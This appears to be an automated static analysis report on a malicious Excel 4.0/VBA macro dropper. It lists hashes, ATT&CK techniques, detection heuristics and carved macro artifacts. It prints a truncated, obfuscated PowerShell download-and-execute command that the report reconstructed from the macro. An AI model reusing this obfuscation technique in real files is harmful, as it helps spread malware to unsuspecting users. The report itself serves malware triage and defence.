Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 22db4af4eb789a76…

MALICIOUS

Office (OLE)

41.0 KB Created: 2020-04-15 07:21:24 Authoring application: Microsoft Excel
MD5: 876dcba1792dd7f9cd44a06283b3ab6b SHA-1: f41a02b9d7d1ebba2193f94285c7deff275d699f SHA-256: 22db4af4eb789a76d62a72d10fd882da37f9c32bebb59098a9d0b9f25ba1e858
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.002 Spearphishing Attachment

The file contains Excel 4.0 macros and VBA macros, with heuristics indicating PowerShell execution and a dropper agent. The XLM macro attempts to execute a PowerShell command that appears to be downloading and executing a second-stage payload. The reconstructed PowerShell command is 'powershell -arg 'sal uu New-Object; &{(} {(}{[}stRING{]}$VErBoSePRefErENce{)}{[}1,3{]}{+}''X''-JoIN''''{)} {(} uu io.compRESSiON.defLaTEstrEaM{(}{[}system.Io.meMoRysTrEaM{]} {[}conVerT{]}::FROMbASE64StriNG{(} ''ZVULU9pKFP4rOxmum60QSXhpGWYualooPlrB1tb'. This indicates a macro-based downloader attempting to fetch and execute further malicious content.

Heuristics 6

  • ClamAV: Xls.Dropper.Agent-7672539-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7672539-0
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt
4129cea6d152e2dffb219e73a9d40433d5b28e7add8ebde7a5f0bede0641c336		 xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 3972 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s). Carved artifact contains 4 long base64-like blob(s).
macros.bas
3aa6eefcc3f3d46f4c083dd1d57301477c181079406b212775366c573487786f		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 908 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.